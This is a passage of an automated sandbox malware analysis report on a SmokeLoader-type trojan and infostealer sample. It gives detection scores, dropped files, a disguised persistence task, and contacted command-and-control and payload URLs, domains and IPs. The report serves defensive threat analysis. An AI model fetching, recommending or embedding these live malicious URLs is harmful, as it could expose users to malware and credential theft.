(likely being stolen) 24->98 50 malenursenect.fun 104.21.1.18, 49855, 49859, 49861 CLOUDFLARENETUS United States 28->50 52 172.67.151.219, 49864, 49876, 49883 CLOUDFLARENETUS United States 28->52 54 2 other IPs or domains 28->54 100 Tries to harvest and steal browser information (history, passwords, etc) 28->100 signatures14

                Screenshots

                Thumbnails

                This section contains all screenshots as thumbnails, including those not shown in the slideshow.


                windows-stand

                Antivirus, Machine Learning and Genetic Malware Detection

                Initial Sample

                SourceDetectionScannerLabelLink
                file.exe34%ReversingLabs
                file.exe100%AviraHEUR/AGEN.1312455
                file.exe100%Joe Sandbox ML

                Dropped Files

                SourceDetectionScannerLabelLink
                C:\Users\user\AppData\Roaming\aueuggs100%AviraHEUR/AGEN.1312455
                C:\Users\user\AppData\Local\Temp\EDBC.exe100%AviraHEUR/AGEN.1316997
                C:\Users\user\AppData\Roaming\aueuggs100%Joe Sandbox ML
                C:\Users\user\AppData\Local\Temp\EDBC.exe100%Joe Sandbox ML
                C:\Users\user\AppData\Local\Temp\6E11.exe100%Joe Sandbox ML
                C:\Users\user\AppData\Local\Temp\Protect544cd51a.dll0%ReversingLabs
                C:\Users\user\AppData\Local\Temp\Protect544cd51a.dll3%VirustotalBrowse
                C:\Users\user\AppData\Roaming\aueuggs34%ReversingLabs
                C:\Users\user\AppData\Roaming\aueuggs46%VirustotalBrowse

                Unpacked PE Files

                No Antivirus matches

                Domains

                SourceDetectionScannerLabelLink
                gudintas.at11%VirustotalBrowse
                malenursenect.fun8%VirustotalBrowse
                fiancejiveimp.fun0%VirustotalBrowse
                h170811.srv22.test-hf.su9%VirustotalBrowse
                farformafor.fun0%VirustotalBrowse
                fullppc.xyz18%VirustotalBrowse

                URLs

                SourceDetectionScannerLabelLink
                http://ocsp.sectigo.com00%URL Reputationsafe
                http://components.groove.net/Groove/Components/SystemComponents/SystemComponents.osd?Package=net.gro0%URL Reputationsafe
                http://ns.adob0%URL Reputationsafe
                https://sectigo.com/CPS00%URL Reputationsafe
                http://rosatiauto.com/tmp/0%URL Reputationsafe
                http://kingpirate.ru/tmp/100%URL Reputationmalware
                http://components.groove.net/Groove/Components/Root.osd?Package=net.groove.Groove.Tools.System.Groov0%URL Reputationsafe
                http://pik96.ru/tmp/100%URL Reputationmalware
                http://gudintas.at/tmp/100%URL Reputationmalware
                http://crl.sectigo.com/SectigoRSATimeStampingCA.crl0t0%URL Reputationsafe
                http://crt.sectigo.com/SectigoRSATimeStampingCA.crt0#0%URL Reputationsafe
                https://java.sun.com0%URL Reputationsafe
                http://malenursenect.fun/A100%Avira URL Cloudmalware
                fiancejiveimp.fun0%Avira URL Cloudsafe
                http://malenursenect.fun/apil100%Avira URL Cloudmalware
                http://fiancejiveimp.fun/apiP0%Avira URL Cloudsafe
                http://fiancejiveimp.fun/apill0%Avira URL Cloudsafe
                http://fiancejiveimp.fun/api)0%Avira URL Cloudsafe
                http://fiancejiveimp.fun/apill0%VirustotalBrowse
                http://h170811.srv22.test-hf.su/186.exe100%Avira URL Cloudmalware
                http://metro.mahapps.com/winfx/xaml/iconpacks0%Avira URL Cloudsafe
                fiancejiveimp.fun0%VirustotalBrowse
                http://malenursenect.fun/api100%Avira URL Cloudmalware
                http://fiancejiveimp.fun/?0%Avira URL Cloudsafe
                http://metro.mahapps.com/winfx/xaml/iconpacks0%VirustotalBrowse
                http://fiancejiveimp.fun/B0%Avira URL Cloudsafe
                http://malenursenect.fun/8yP100%Avira URL Cloudmalware
                http://fiancejiveimp.fun/api0%Avira URL Cloudsafe
                http://malenursenect.fun/apiQu-100%Avira URL Cloudmalware
                http://malsvchost.exe0%Avira URL Cloudsafe
                http://fiancejiveimp.fun/api0%VirustotalBrowse
                http://malenursenect.fun/100%Avira URL Cloudmalware
                http://fiancejiveimp.fun/apiy0%Avira URL Cloudsafe
                http://malenursenect.fun/api9uU100%Avira URL Cloudmalware
                http://malenursenect.fun/Qy100%Avira URL Cloudmalware
                http://fiancejiveimp.fun/Y0%Avira URL Cloudsafe
                http://193.149.185.139/ofdskiewerews/update.exe0%Avira URL Cloudsafe
                http://malenursenect.fun/8%VirustotalBrowse
                http://fiancejiveimp.fun/apil0%Avira URL Cloudsafe
                http://fiancejiveimp.fun/apik0%Avira URL Cloudsafe
                http://fiancejiveimp.fun/p0%Avira URL Cloudsafe
                http://fiancejiveimp.fun/apiq0%Avira URL Cloudsafe
                http://fiancejiveimp.fun/h0%Avira URL Cloudsafe
                http://malenursenect.fun/Fy100%Avira URL Cloudmalware
                http://fiancejiveimp.fun/0%Avira URL Cloudsafe
                http://malenursenect.fun/apiH100%Avira URL Cloudmalware
                http://malenursenect.fun/0100%Avira URL Cloudmalware
                fullppc.yz0%Avira URL Cloudsafe
                http://fiancejiveimp.fun/apil0%VirustotalBrowse
                http://fiancejiveimp.fun/apillr0%Avira URL Cloudsafe
                http://fiancejiveimp.fun/0%VirustotalBrowse
                http://malenursenect.fun/api)t%100%Avira URL Cloudmalware

                Domains and IPs

                Contacted Domains

                NameIPActiveMaliciousAntivirus DetectionReputation
                gudintas.at
                		211.181.24.133
                		truetrueunknown
                malenursenect.fun
                		104.21.1.18
                		truetrueunknown
                fiancejiveimp.fun
                		104.21.81.17
                		truetrueunknown
                h170811.srv22.test-hf.su
                		91.227.16.22
                		truetrueunknown
                farformafor.fun
                		unknown
                		unknowntrueunknown
                fullppc.xyz
                		unknown
                		unknowntrueunknown

                Contacted URLs

                NameMaliciousAntivirus DetectionReputation
                fiancejiveimp.funtrue
                • 0%, Virustotal, Browse
                • Avira URL Cloud: safe
                		unknown
                http://h170811.srv22.test-hf.su/186.exetrue
                • Avira URL Cloud: malware
                		unknown
                http://malenursenect.fun/apitrue
                • Avira URL Cloud: malware
                		unknown
                http://fiancejiveimp.fun/apitrue
                • 0%, Virustotal, Browse
                • Avira URL Cloud: safe
                		unknown
                http://rosatiauto.com/tmp/true
                • URL Reputation: safe
                		unknown
                http://kingpirate.ru/tmp/true
                • URL Reputation: malware
                		unknown
                http://pik96.ru/tmp/true
                • URL Reputation: malware
                		unknown
                http://gudintas.at/tmp/true
                • URL Reputation: malware
                		unknown
                http://193.149.185.139/ofdskiewerews/update.exetrue
                • Avira URL Cloud: safe
                		unknown
                fullppc.yztrue
                • Avira URL Cloud: safe
                		unknown

                URLs from Memory and Binaries

                NameSourceMaliciousAntivirus DetectionReputation
                https://duckduckgo.com/chrome_newtabRegAsm.exe, 00000016.00000002.1122925275.0000000003BF9000.00000004.00000020.00020000.00000000.sdmpfalse
                  		high
                  https://duckduckgo.com/ac/?q=RegAsm.exe, 00000016.00000002.1122925275.0000000003BF9000.00000004.00000020.00020000.00000000.sdmpfalse
                    		high
                    http://ocsp.sectigo.com06E11.exe.1.drfalse
                    • URL Reputation: safe
                    		unknown
                    http://fiancejiveimp.fun/apiPRegAsm.exe, 00000016.00000002.1121991366.00000000014F0000.00000004.00000020.00020000.00000000.sdmpfalse
                    • Avira URL Cloud: safe
                    		unknown
                    http://components.groove.net/Groove/Components/SystemComponents/SystemComponents.osd?Package=net.groexplorer.exe, 00000001.00000000.900098420.00007FFA11519000.00000002.00000001.01000000.00000006.sdmpfalse
                    • URL Reputation: safe
                    		unknown
                    http://malenursenect.fun/AAppLaunch.exe, 00000019.00000002.1149924480.0000000007AD0000.00000004.00000020.00020000.00000000.sdmpfalse
                    • Avira URL Cloud: malware
                    		unknown
                    https://www.google.com/intl/en_uk/chrome/https://www.google.com/intl/en_uk/chrome/https://www.googleRegAsm.exe, 00000016.00000002.1122515831.0000000003A6B000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000016.00000002.1122925275.0000000003BC7000.00000004.00000020.00020000.00000000.sdmp, AppLaunch.exe, 00000019.00000002.1149623995.00000000078F2000.00000004.00000020.00020000.00000000.sdmpfalse
                      		high
                      http://fiancejiveimp.fun/apillRegAsm.exe, 00000016.00000002.1121991366.000000000153B000.00000004.00000020.00020000.00000000.sdmpfalse
                      • 0%, Virustotal, Browse
                      • Avira URL Cloud: safe
                      		unknown
                      http://malenursenect.fun/apilAppLaunch.exe, 00000019.00000002.1149273611.00000000053D5000.00000004.00000020.00020000.00000000.sdmpfalse
                      • Avira URL Cloud: malware
                      		unknown
                      http://metro.mahapps.com/winfx/xaml/iconpacks6E11.exe, 00000015.00000000.1046466838.0000000000892000.00000002.00000001.01000000.00000008.sdmp, 6E11.exe.1.drfalse
                      • 0%, Virustotal, Browse
                      • Avira URL Cloud: safe
                      		unknown
                      https://www.google.com/search?q=.netAppLaunch.exe, 00000019.00000002.1149623995.00000000078FE000.00000004.00000020.00020000.00000000.sdmpfalse
                        		high
                        http://ns.adobexplorer.exe, 00000001.00000000.896581673.0000000002E89000.00000004.00000001.00020000.00000000.sdmpfalse
                        • URL Reputation: safe
                        		unknown
                        http://fiancejiveimp.fun/api)RegAsm.exe, 00000016.00000002.1121991366.000000000153B000.00000004.00000020.00020000.00000000.sdmpfalse
                        • Avira URL Cloud: safe
                        		unknown
                        https://www.google.comAppLaunch.exe, 00000019.00000002.1149924480.0000000007A9C000.00000004.00000020.00020000.00000000.sdmpfalse
                          		high
                          https://www.google.com/intl/en_uk/chrome/RegAsm.exe, 00000016.00000002.1122515831.0000000003A6B000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000016.00000002.1122925275.0000000003BC7000.00000004.00000020.00020000.00000000.sdmp, AppLaunch.exe, 00000019.00000002.1149623995.00000000078F2000.00000004.00000020.00020000.00000000.sdmpfalse
                            		high
                            http://fiancejiveimp.fun/?RegAsm.exe, 00000016.00000002.1121991366.000000000153B000.00000004.00000020.00020000.00000000.sdmpfalse
                            • Avira URL Cloud: safe
                            		unknown
                            http://fiancejiveimp.fun/BRegAsm.exe, 00000016.00000002.1121991366.000000000153B000.00000004.00000020.00020000.00000000.sdmpfalse
                            • Avira URL Cloud: safe
                            		unknown
                            https://www.google.com/sorry/index?continue=https://www.google.com/search%3Fq%3D.net%2B4.8.1%26oq%3DAppLaunch.exe, 00000019.00000002.1149623995.00000000078E6000.00000004.00000020.00020000.00000000.sdmp, AppLaunch.exe, 00000019.00000002.1149623995.00000000078FE000.00000004.00000020.00020000.00000000.sdmpfalse
                              		high
                              http://malenursenect.fun/8yPAppLaunch.exe, 00000019.00000002.1149273611.0000000005418000.00000004.00000020.00020000.00000000.sdmpfalse
                              • Avira URL Cloud: malware
                              		unknown
                              http://malenursenect.fun/apiQu-AppLaunch.exe, 00000019.00000002.1149273611.0000000005418000.00000004.00000020.00020000.00000000.sdmpfalse
                              • Avira URL Cloud: malware
                              		unknown
                              http://malsvchost.exeRegAsm.exe, 00000016.00000002.1122925275.0000000003C6D000.00000004.00000020.00020000.00000000.sdmpfalse
                              • Avira URL Cloud: safe
                              		unknown
                              http://malenursenect.fun/AppLaunch.exe, 00000019.00000002.1149273611.0000000005418000.00000004.00000020.00020000.00000000.sdmp, AppLaunch.exe, 00000019.00000002.1149924480.0000000007C4B000.00000004.00000020.00020000.00000000.sdmp, AppLaunch.exe, 00000019.00000002.1149924480.0000000007AD0000.00000004.00000020.00020000.00000000.sdmp, AppLaunch.exe, 00000019.00000002.1149273611.00000000053B6000.00000004.00000020.00020000.00000000.sdmp, AppLaunch.exe, 00000019.00000002.1149623995.000000000792A000.00000004.00000020.00020000.00000000.sdmpfalse
                              • 8%, Virustotal, Browse
                              • Avira URL Cloud: malware
                              		unknown
                              https://sectigo.com/CPS06E11.exe.1.drfalse
                              • URL Reputation: safe
                              		unknown
                              https://www.google.com/images/branding/product/ico/googleg_lodp.icoRegAsm.exe, 00000016.00000002.1122925275.0000000003BF9000.00000004.00000020.00020000.00000000.sdmpfalse
                                		high
                                https://dl.google.com/tag/s/appguid%3D%7B8A69D345-D564-463C-AFF1-A69D9E530F96%7D%26iid%3D%7BBD4EA3DARegAsm.exe, 00000016.00000002.1122515831.0000000003A6B000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000016.00000002.1122925275.0000000003BC7000.00000004.00000020.00020000.00000000.sdmp, AppLaunch.exe, 00000019.00000002.1149623995.00000000078F2000.00000004.00000020.00020000.00000000.sdmpfalse
                                  		high
                                  http://components.groove.net/Groove/Components/Root.osd?Package=net.groove.Groove.Tools.System.Groovexplorer.exe, 00000001.00000000.900098420.00007FFA11519000.00000002.00000001.01000000.00000006.sdmpfalse
                                  • URL Reputation: safe
                                  		unknown
                                  http://fiancejiveimp.fun/apiyRegAsm.exe, 00000016.00000002.1121991366.000000000153B000.00000004.00000020.00020000.00000000.sdmpfalse
                                  • Avira URL Cloud: safe
                                  		unknown
                                  http://malenursenect.fun/api9uUAppLaunch.exe, 00000019.00000002.1149273611.0000000005418000.00000004.00000020.00020000.00000000.sdmpfalse
                                  • Avira URL Cloud: malware
                                  		unknown
                                  https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=RegAsm.exe, 00000016.00000002.1122925275.0000000003BF9000.00000004.00000020.00020000.00000000.sdmpfalse
                                    		high
                                    https://search.yahoo.com/favicon.icohttps://search.yahoo.com/searchRegAsm.exe, 00000016.00000002.1122925275.0000000003BF9000.00000004.00000020.00020000.00000000.sdmpfalse
                                      		high
                                      https://www.google.com/setprefs?sig=0_d7toVxfMKzFj4yeYEy5xHRJrV_I%3D&source=en_ignored_notification&AppLaunch.exe, 00000019.00000002.1149623995.00000000078E6000.00000004.00000020.00020000.00000000.sdmp, AppLaunch.exe, 00000019.00000002.1149623995.00000000078FE000.00000004.00000020.00020000.00000000.sdmpfalse
                                        		high
                                        https://www.ecosia.org/newtab/RegAsm.exe, 00000016.00000002.1122925275.0000000003BF9000.00000004.00000020.00020000.00000000.sdmpfalse
                                          		high
                                          http://malenursenect.fun/QyAppLaunch.exe, 00000019.00000002.1149273611.0000000005418000.00000004.00000020.00020000.00000000.sdmpfalse
                                          • Avira URL Cloud: malware
                                          		unknown
                                          https://search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas_sfp&command=RegAsm.exe, 00000016.00000002.1122925275.0000000003BF9000.00000004.00000020.00020000.00000000.sdmpfalse
                                            		high
                                            http://fiancejiveimp.fun/YRegAsm.exe, 00000016.00000002.1121991366.000000000153B000.00000004.00000020.00020000.00000000.sdmpfalse
                                            • Avira URL Cloud: safe
                                            		unknown
                                            https://ac.ecosia.org/autocomplete?q=RegAsm.exe, 00000016.00000002.1122925275.0000000003BF9000.00000004.00000020.00020000.00000000.sdmpfalse
                                              		high
                                              https://search.yahoo.com?fr=crmas_sfpRegAsm.exe, 00000016.00000002.1122925275.0000000003BF9000.00000004.00000020.00020000.00000000.sdmpfalse
                                                		high
                                                http://crl.sectigo.com/SectigoRSATimeStampingCA.crl0t6E11.exe.1.drfalse
                                                • URL Reputation: safe
                                                		unknown
                                                http://fiancejiveimp.fun/apilRegAsm.exe, 00000016.00000002.1121991366.000000000153B000.00000004.00000020.00020000.00000000.sdmpfalse
                                                • 0%, Virustotal, Browse
                                                • Avira URL Cloud: safe
                                                		unknown
                                                http://fiancejiveimp.fun/apikRegAsm.exe, 00000016.00000002.1121991366.00000000014F0000.00000004.00000020.00020000.00000000.sdmpfalse
                                                • Avira URL Cloud: safe
                                                		unknown
                                                http://fiancejiveimp.fun/pRegAsm.exe, 00000016.00000002.1121991366.000000000153B000.00000004.00000020.00020000.00000000.sdmpfalse
                                                • Avira URL Cloud: safe
                                                		unknown
                                                http://fiancejiveimp.fun/apiqRegAsm.exe, 00000016.00000002.1121991366.000000000153B000.00000004.00000020.00020000.00000000.sdmpfalse
                                                • Avira URL Cloud: safe
                                                		unknown
                                                http://crt.sectigo.com/SectigoRSATimeStampingCA.crt0#6E11.exe.1.drfalse
                                                • URL Reputation: safe
                                                		unknown
                                                https://java.sun.comexplorer.exe, 00000001.00000000.896996023.00000000067AB000.00000004.00000001.00020000.00000000.sdmpfalse
                                                • URL Reputation: safe
                                                		unknown
                                                http://fiancejiveimp.fun/hRegAsm.exe, 00000016.00000002.1121991366.00000000014F0000.00000004.00000020.00020000.00000000.sdmpfalse
                                                • Avira URL Cloud: safe
                                                		unknown
                                                http://malenursenect.fun/FyAppLaunch.exe, 00000019.00000002.1149273611.0000000005418000.00000004.00000020.00020000.00000000.sdmpfalse
                                                • Avira URL Cloud: malware
                                                		unknown
                                                http://fiancejiveimp.fun/RegAsm.exe, 00000016.00000002.1121991366.000000000153B000.00000004.00000020.00020000.00000000.sdmpfalse
                                                • 0%, Virustotal, Browse
                                                • Avira URL Cloud: safe
                                                		unknown
                                                http://malenursenect.fun/apiHAppLaunch.exe, 00000019.00000002.1149273611.00000000053D5000.00000004.00000020.00020000.00000000.sdmpfalse
                                                • Avira URL Cloud: malware
                                                		unknown
                                                http://malenursenect.fun/0AppLaunch.exe, 00000019.00000002.1149623995.000000000792A000.00000004.00000020.00020000.00000000.sdmpfalse
                                                • Avira URL Cloud: malware
                                                		unknown
                                                https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=RegAsm.exe, 00000016.00000002.1122925275.0000000003BF9000.00000004.00000020.00020000.00000000.sdmpfalse
                                                  		high
                                                  http://fiancejiveimp.fun/apillrRegAsm.exe, 00000016.00000002.1121991366.000000000153B000.00000004.00000020.00020000.00000000.sdmpfalse
                                                  • Avira URL Cloud: safe
                                                  		unknown
                                                  http://malenursenect.fun/api)t%AppLaunch.exe, 00000019.00000002.1149273611.0000000005418000.00000004.00000020.00020000.00000000.sdmpfalse
                                                  • Avira URL Cloud: malware
                                                  		unknown

                                                  World Map of Contacted IPs

                                                  • No. of IPs < 25%
                                                  • 25% < No. of IPs < 50%
                                                  • 50% < No. of IPs < 75%
                                                  • 75% < No. of IPs

                                                  Public IPs

                                                  IPDomainCountryFlagASNASN NameMalicious
                                                  200.92.136.254
                                                  		unknownMexico
                                                  		13999MegaCableSAdeCVMXtrue
                                                  104.21.1.18
                                                  		malenursenect.funUnited States
                                                  		13335CLOUDFLARENETUStrue
                                                  211.181.24.133
                                                  		gudintas.atKorea Republic of
                                                  		3786LGDACOMLGDACOMCorporationKRtrue
                                                  193.149.185.139
                                                  		unknownDenmark
                                                  		15411DANISCODKtrue
                                                  172.67.137.125
                                                  		unknownUnited States
                                                  		13335CLOUDFLARENETUStrue
                                                  104.21.81.17
                                                  		fiancejiveimp.funUnited States
                                                  		13335CLOUDFLARENETUStrue
                                                  172.67.151.219
                                                  		unknownUnited States
                                                  		13335CLOUDFLARENETUStrue
                                                  186.182.55.44
                                                  		unknownArgentina
                                                  		11664TechtelLMDSComunicacionesInteractivasSAARtrue
                                                  180.94.156.61
                                                  		unknownMacau
                                                  		4609CTM-MOCompanhiadeTelecomunicacoesdeMacauSARLMOtrue
                                                  91.227.16.22
                                                  		h170811.srv22.test-hf.suRussian Federation
                                                  		207027EXIMIUS-ASRUtrue
                                                  186.147.159.19
                                                  		unknownColombia
                                                  		10620TelmexColombiaSACOtrue

                                                  Private

                                                  IP
                                                  192.168.2.1

                                                  General Information

                                                  Joe Sandbox Version:38.0.0 Beryl
                                                  Analysis ID:1318516
                                                  Start date and time:2023-10-03 09:53:07 +02:00
                                                  Joe Sandbox Product:CloudBasic
                                                  Overall analysis duration:0h 8m 55s
                                                  Hypervisor based Inspection enabled:false
                                                  Report type:full
                                                  Cookbook file name:default.jbs
                                                  Analysis system description:Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 104, IE 11, Adobe Reader DC 19, Java 8 Update 211
                                                  Number of analysed new started processes analysed:28
                                                  Number of new started drivers analysed:0
                                                  Number of existing processes analysed:0
                                                  Number of existing drivers analysed:0
                                                  Number of injected processes analysed:1
                                                  Technologies:
                                                  • HCA enabled
                                                  • EGA enabled
                                                  • AMSI enabled
                                                  Analysis Mode:default
                                                  Analysis stop reason:Timeout
                                                  Sample file name:file.exe
                                                  Detection:MAL
                                                  Classification:mal100.troj.spyw.evad.winEXE@12/11@89/12
                                                  EGA Information:
                                                  • Successful, ratio: 100%
                                                  HCA Information:
                                                  • Successful, ratio: 93%
                                                  • Number of executed functions: 146
                                                  • Number of non-executed functions: 128
                                                  Cookbook Comments:
                                                  • Found application associated with file extension: .exe

                                                  Warnings

                                                  • Exclude process from analysis (whitelisted): BackgroundTransferHost.exe, WerFault.exe, RuntimeBroker.exe, backgroundTaskHost.exe, svchost.exe, wuapihost.exe
                                                  • Excluded IPs from analysis (whitelisted): 20.42.65.92
                                                  • Excluded domains from analysis (whitelisted): ris.api.iris.microsoft.com, client.wns.windows.com, onedsblobprdeus17.eastus.cloudapp.azure.com, login.live.com, blobcollector.events.data.trafficmanager.net, tse1.mm.bing.net, ctldl.windowsupdate.com, displaycatalog.mp.microsoft.com, g.bing.com, watson.telemetry.microsoft.com, arc.msn.com
                                                  • Not all processes where analyzed, report is missing behavior information
                                                  • Report creation exceeded maximum time and may have missing disassembly code information.
                                                  • Report size exceeded maximum capacity and may have missing behavior information.
                                                  • Report size getting too big, too many NtAllocateVirtualMemory calls found.
                                                  • Report size getting too big, too many NtDeviceIoControlFile calls found.
                                                  • Report size getting too big, too many NtOpenKeyEx calls found.
                                                  • Report size getting too big, too many NtProtectVirtualMemory calls found.
                                                  • Report size getting too big, too many NtQueryDirectoryFile calls found.
                                                  • Report size getting too big, too many NtQueryValueKey calls found.

                                                  Simulations

                                                  Behavior and APIs

                                                  TimeTypeDescription
                                                  00:54:19Task SchedulerRun new task: Firefox Default Browser Agent 2BF8F19A752EACC8 path: C:\Users\user\AppData\Roaming\aueuggs
                                                  09:54:01API Interceptor133936x Sleep call for process: explorer.exe modified
                                                  09:55:10API Interceptor1x Sleep call for process: 6E11.exe modified
                                                  09:55:11API Interceptor1x Sleep call for process: RegAsm.exe modified
                                                  09:55:17API Interceptor1x Sleep call for process: AppLaunch.exe modified
                                                  09:55:20API Interceptor1x Sleep call for process: WerFault.exe modified

                                                  Joe Sandbox View / Context

                                                  IPs

                                                  MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                  200.92.136.254file.exeGet hashmaliciousClipboard Hijacker, SmokeLoaderBrowse
                                                  • gudintas.at/tmp/
                                                  file.exeGet hashmaliciousSmokeLoaderBrowse
                                                  • gudintas.at/tmp/
                                                  BgL6t8Fl3u.exeGet hashmaliciousSmokeLoaderBrowse
                                                  • gudintas.at/tmp/
                                                  211.181.24.133file.exeGet hashmaliciousSmokeLoaderBrowse
                                                  • gudintas.at/tmp/
                                                  file.exeGet hashmaliciousSmokeLoaderBrowse
                                                  • gudintas.at/tmp/
                                                  file.exeGet hashmaliciousSmokeLoaderBrowse
                                                  • gudintas.at/tmp/
                                                  file.exeGet hashmaliciousSmokeLoaderBrowse
                                                  • gudintas.at/tmp/
                                                  file.exeGet hashmaliciousSmokeLoaderBrowse
                                                  • gudintas.at/tmp/
                                                  file.exeGet hashmaliciousSmokeLoaderBrowse
                                                  • gudintas.at/tmp/
                                                  file.exeGet hashmaliciousBabuk, Clipboard Hijacker, Djvu, Fabookie, RedLine, SmokeLoaderBrowse
                                                  • colisumy.com/dl/build2.exe
                                                  xKBUmzYvEw.exeGet hashmaliciousSmokeLoaderBrowse
                                                  • gudintas.at/tmp/
                                                  file.exeGet hashmaliciousSmokeLoaderBrowse
                                                  • gudintas.at/tmp/
                                                  file.exeGet hashmaliciousSmokeLoaderBrowse
                                                  • taibi.at/tmp/
                                                  file.exeGet hashmaliciousSmokeLoaderBrowse
                                                  • taibi.at/tmp/
                                                  SecuriteInfo.com.Win32.DropperX-gen.2236.8653.exeGet hashmaliciousSmokeLoaderBrowse
                                                  • taibi.at/tmp/
                                                  file.exeGet hashmaliciousSmokeLoaderBrowse
                                                  • taibi.at/tmp/
                                                  file.exeGet hashmaliciousSmokeLoaderBrowse
                                                  • taibi.at/tmp/
                                                  file.exeGet hashmaliciousSmokeLoaderBrowse
                                                  • taibi.at/tmp/
                                                  file.exeGet hashmaliciousSmokeLoaderBrowse
                                                  • taibi.at/tmp/
                                                  file.exeGet hashmaliciousSmokeLoaderBrowse
                                                  • taibi.at/tmp/
                                                  file.exeGet hashmaliciousSmokeLoaderBrowse
                                                  • taibi.at/tmp/

                                                  Domains

                                                  MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                  gudintas.atfile.exeGet hashmaliciousSmokeLoaderBrowse
                                                  • 211.53.230.67
                                                  file.exeGet hashmaliciousSmokeLoaderBrowse
                                                  • 190.224.203.37
                                                  file.exeGet hashmaliciousSmokeLoaderBrowse
                                                  • 211.104.254.139
                                                  file.exeGet hashmaliciousDjvu, Fabookie, Glupteba, RedLine, SmokeLoaderBrowse
                                                  • 95.107.163.44
                                                  file.exeGet hashmaliciousSmokeLoaderBrowse
                                                  • 181.170.86.159
                                                  file.exeGet hashmaliciousBabuk, Clipboard Hijacker, Djvu, RedLine, SmokeLoaderBrowse
                                                  • 211.59.14.90
                                                  file.exeGet hashmaliciousSmokeLoaderBrowse
                                                  • 186.182.55.44
                                                  VYACm4h0WB.exeGet hashmaliciousDjvu, Fabookie, Glupteba, RedLine, SmokeLoaderBrowse
                                                  • 186.147.159.19
                                                  file.exeGet hashmaliciousSmokeLoaderBrowse
                                                  • 211.119.84.112
                                                  file.exeGet hashmaliciousSmokeLoaderBrowse
                                                  • 115.88.24.200
                                                  uDtn1lMsJR.exeGet hashmaliciousSmokeLoaderBrowse
                                                  • 190.12.87.61
                                                  file.exeGet hashmaliciousClipboard Hijacker, SmokeLoaderBrowse
                                                  • 37.34.248.24
                                                  file.exeGet hashmaliciousClipboard Hijacker, SmokeLoaderBrowse
                                                  • 211.171.233.129
                                                  file.exeGet hashmaliciousClipboard Hijacker, SmokeLoaderBrowse
                                                  • 187.18.108.158
                                                  file.exeGet hashmaliciousClipboard Hijacker, SmokeLoaderBrowse
                                                  • 84.224.216.79
                                                  file.exeGet hashmaliciousClipboard Hijacker, SmokeLoaderBrowse
                                                  • 124.43.19.179
                                                  file.exeGet hashmaliciousDjvu, Fabookie, Glupteba, RedLine, SmokeLoaderBrowse
                                                  • 211.181.24.132
                                                  file.exeGet hashmaliciousClipboard Hijacker, SmokeLoaderBrowse
                                                  • 195.158.3.162
                                                  file.exeGet hashmaliciousSmokeLoaderBrowse
                                                  • 190.12.87.61
                                                  file.exeGet hashmaliciousDjvu, Fabookie, Glupteba, RedLine, SmokeLoaderBrowse
                                                  • 187.18.108.158
                                                  h170811.srv22.test-hf.sulpD7vDCZmS.exeGet hashmaliciousSmokeLoaderBrowse
                                                  • 91.227.16.22
                                                  file.exeGet hashmaliciousRedLine, SmokeLoaderBrowse
                                                  • 91.227.16.22

                                                  ASNs

                                                  MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                  CLOUDFLARENETUSET2321000550.exeGet hashmaliciousFormBookBrowse
                                                  • 172.67.181.81
                                                  Verification.htmlGet hashmaliciousUnknownBrowse
                                                  • 172.66.47.164
                                                  http://truquestbb.com/en/Get hashmaliciousUnknownBrowse
                                                  • 172.67.38.66
                                                  https://ipfs.io/ipfs/QmTpKiHf1hhVEJ3pYmFTqSegpJsqMXJTqMqKgCvFmrbkGr?filename=indextwinarmy.html#test.test@test.comGet hashmaliciousUnknownBrowse
                                                  • 104.17.25.14
                                                  Pre-Advice_Report.xlam.xlsxGet hashmaliciousAgentTeslaBrowse
                                                  • 104.21.45.138
                                                  OC_7068_Change_of_Bank_Details.xlam.xlsxGet hashmaliciousAgentTeslaBrowse
                                                  • 172.67.215.45
                                                  https://truquestbb.com/en/Get hashmaliciousUnknownBrowse
                                                  • 172.67.38.66
                                                  Segundo_comprobante_de_pago.vbsGet hashmaliciousAgentTeslaBrowse
                                                  • 172.67.215.45
                                                  DHL_#Ucd5c#Uc885_#Uc120#Ud558#Uc99d#Uad8c_175955...exeGet hashmaliciousAgentTeslaBrowse
                                                  • 162.159.135.232
                                                  PO_2846DYK-NO_#20485-2000PCS.vbsGet hashmaliciousAgentTeslaBrowse
                                                  • 162.159.138.232
                                                  Part_number_91875-11400_x_6.xlsGet hashmaliciousUnknownBrowse
                                                  • 104.21.60.158
                                                  xD0aqsLra5.exeGet hashmaliciousLimeRATBrowse
                                                  • 172.67.34.170
                                                  CnFC13XvMz.exeGet hashmaliciousGluptebaBrowse
                                                  • 162.159.135.233
                                                  CnFC13XvMz.exeGet hashmaliciousGluptebaBrowse
                                                  • 162.159.135.233
                                                  https://tafeconnect.comGet hashmaliciousUnknownBrowse
                                                  • 1.1.1.1
                                                  eNLvmvek1n.elfGet hashmaliciousMiraiBrowse
                                                  • 1.3.36.140
                                                  https://customervoice.microsoft.com/Pages/ResponsePage.aspx?id=6yLQGwOu7EaLZPDQhpKnjmxmyy4bltxFvzQrw3h0_xtUM01VOU4yQThJNVAwODlHS0VaWDlHTlVXOS4uGet hashmaliciousUnknownBrowse
                                                  • 104.17.2.184
                                                  https://members.smoove.io/lk0bggqzmnt5an53g8wozgbybghzbfot3inoeitynybnbsnedn1tyjknbrn8ans.ashxGet hashmaliciousPhisherBrowse
                                                  • 104.21.58.35
                                                  NordVPNSetup.exeGet hashmaliciousBazaLoader, Mars Stealer, VidarBrowse
                                                  • 104.19.185.81
                                                  https://members.smoove.io/lk0bggqzmnt5an53g8wozgbybghzbfot3inoeitynybnbsnedn1tyjknbrn8ans.ashxGet hashmaliciousHTMLPhisherBrowse
                                                  • 104.18.11.104
                                                  LGDACOMLGDACOMCorporationKRfile.exeGet hashmaliciousSmokeLoaderBrowse
                                                  • 211.119.84.111
                                                  sora.arm.elfGet hashmaliciousMiraiBrowse
                                                  • 211.40.72.77
                                                  file.exeGet hashmaliciousSmokeLoaderBrowse
                                                  • 211.53.230.67
                                                  c5cyKXVANd.elfGet hashmaliciousMiraiBrowse
                                                  • 210.92.143.50
